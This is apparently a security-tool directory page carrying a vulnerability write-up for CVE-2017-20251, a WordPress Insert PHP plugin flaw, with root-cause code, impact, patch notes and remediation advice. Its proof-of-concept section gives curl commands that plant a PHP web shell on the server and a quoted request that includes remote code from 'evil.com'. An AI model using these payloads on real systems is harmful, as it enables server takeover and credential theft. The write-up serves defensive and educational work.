Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
By-Poloss..-..CVE-2017-20251 — Insert PHP Plugin PHP Code Injection | Kitploit
Tools/GitHubGitHub/polosss/by-poloss..-..cve-2017-20251
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubpolosss/by-poloss..-..cve-2017-20251

By-Poloss..-..CVE-2017-20251

Insert PHP Plugin PHP Code Injection

View Repository
163 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2017-20251: Insert PHP Plugin PHP Code Injection

Vulnerability Title

Unauthenticated PHP Code Injection via Shortcode Processing in Insert PHP Plugin

Basic Information

FieldValue
CVE IDCVE-2017-20251
PluginInsert PHP (now Woody Code Snippets)
Affected Versions< 3.3.1 (tested on 1.3)
CWECWE-94 (Code Injection)
CVSS v3.19.8 (Critical)
CVSS VectorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
DisclosurePublic (Exploit-DB 41308)

Description

The Insert PHP plugin before version 3.3.1 allows remote attackers to execute arbitrary PHP code via a shortcode injection vulnerability. The plugin registers a [insert_php]...[/insert_php] shortcode that directly evaluates the content inside the shortcode tags using PHP's eval() function without any sanitization or validation.

An attacker who can create or modify posts (via the REST API, XML-RPC, or with contributor/admin access) can inject arbitrary PHP code into any page or post that renders their content, achieving full remote code execution on the web server.

Technical Analysis

Root Cause

The vulnerability exists in the will_bontrager_insert_php() function registered as a the_content filter:

// File: insert-php/insert_php.php
function will_bontrager_insert_php($content) {
    $will_bontrager_content = $content;
    preg_match_all(
        '!\[insert_php[^\]]*\](.*?)\[/insert_php[^\]]*\]!is',
        $will_bontrager_content,
        $will_bontrager_matches
    );
    $will_bontrager_nummatches = count($will_bontrager_matches[0]);
    for ($will_bontrager_i = 0; $will_bontrager_i < $will_bontrager_nummatches; $will_bontrager_i++) {
        ob_start();
        eval($will_bontrager_matches[1][$will_bontrager_i]);  // <-- VULNERABLE
        $will_bontrager_replacement = ob_get_contents();
        ob_clean();
        ob_end_flush();
        $will_bontrager_content = preg_replace(
            '/'.preg_quote($will_bontrager_matches[0][$will_bontrager_i], '/').'/',
            $will_bontrager_replacement,
            $will_bontrager_content,
            1
        );
    }
    return $will_bontrager_content;
}

add_filter('the_content', 'will_bontrager_insert_php', 9);

Key Issues:

  1. The shortcode content is passed directly to eval() without any sanitization
  2. No authentication or capability check is performed
  3. No validation that the content is from a legitimate snippet post
  4. The filter runs at priority 9, processing content before other WordPress filters

Attack Vector

  1. Initial Access: Attacker creates or edits a post with malicious content containing [insert_php] shortcode
  2. Delivery: The shortcode is stored in the WordPress database as post content
  3. Execution: When any user views the page, WordPress runs the_content filters
  4. Impact: The eval() executes arbitrary PHP code on the server

Conditions for Exploitation

  • WordPress site with Insert PHP plugin version < 3.3.1 installed and activated
  • Attacker must have ability to create or edit posts (contributor role or higher)
  • In WordPress < 4.7, the REST API allowed unauthenticated post creation (enabling full unauth RCE)
  • In WordPress >= 4.7, authentication is required for REST API post creation

Impact

Severity: Critical

Full Remote Code Execution (RCE) on the web server:

  • Execute arbitrary PHP code on the server
  • Read/write any file accessible to the web server user
  • Access database credentials from wp-config.php
  • Install web shells or backdoors
  • Pivot to other systems
  • Complete compromise of confidentiality, integrity, and availability

PoC - Curl Commands

Step 1: Create a Post with Malicious Shortcode (Authenticated)

curl -s -k -X POST "https://yorbit7.ddev.site/wp-json/wp/v2/posts" \
  -H "Content-Type: application/json" \
  -u "USERNAME:APPLICATION_PASSWORD" \
  -d '{
    "title": "Malicious Post",
    "content": "[insert_php]file_put_contents(\"/var/www/html/shell.php\",\"<?php system(\\$_GET[\\\"cmd\\\"]); ?>\");[/insert_php]",
    "status": "publish"
  }'

Step 2: Visit the Post to Trigger Code Execution

curl -s -k "https://yorbit7.ddev.site/?p=POST_ID"

Step 3: Verify Code Execution

curl -s -k "https://yorbit7.ddev.site/shell.php?cmd=id"

Alternative: Direct eval() Test (Simple Proof)

# Create post
curl -s -k -X POST "https://yorbit7.ddev.site/wp-json/wp/v2/posts" \
  -H "Content-Type: application/json" \
  -u "USERNAME:APPLICATION_PASSWORD" \
  -d '{"title":"RCE Test","content":"[insert_php]file_put_contents(\"/var/www/html/rce_poc.txt\",\"RCE-SUCCESS\");[/insert_php]","status":"publish"}'

# Trigger
curl -s -k "https://yorbit7.ddev.site/?p=POST_ID"

# Verify
cat /var/www/html/rce_poc.txt  # Should output: RCE-SUCCESS

Exploit-DB Reference (Unauthenticated, WP < 4.7)

For older WordPress versions where the REST API allowed unauthenticated post creation:

curl -s -k -X POST "/wp-json/wp/v2/posts/1234" \
  -H "Host: target.com" \
  -H "Content-Type: application/json" \
  -d '{
    "id": "1234ffff",
    "title": "by Hacker",
    "content": "[insert_php]include(\"http://evil.com/file.php\");[/insert_php]"
  }'

Response Example

When the vulnerable shortcode is processed, the PHP code inside is executed by eval(). For the marker file test:

Request: Create post with [insert_php]file_put_contents("marker.txt","SUCCESS");[/insert_php]
Response: Post created successfully

Request: GET /?p=POST_ID
Response: Page renders, PHP code executes, marker.txt created on server

Verification:
$ cat /var/www/html/marker.txt
SUCCESS

Recommended Remediation

  1. Immediate: Uninstall the Insert PHP plugin or upgrade to version 3.3.1 or later
  2. Alternative Plugin: Use a modern code snippet plugin like WPCode that uses safe execution contexts
  3. If Must Use PHP Snippets: Ensure only trusted administrators can create/edit posts, and consider disabling the REST API for non-admins
  4. Hardening: Set DISALLOW_UNFILTERED_HTML constant (though this doesn't fully mitigate the issue)

Patch Analysis

The patched version (3.3.1+):

  • Renamed shortcode from [insert_php] to [wbcr_php_snippet]
  • Removed direct eval() usage in favor of a safe execution context
  • Added authentication checks on REST API endpoints
  • Implemented snippet ID validation before execution

References

  • Exploit-DB 41308
  • NVD CVE-2017-20251
  • WordPress Plugin Page
  • CWE-94: Code Injection
Download Tool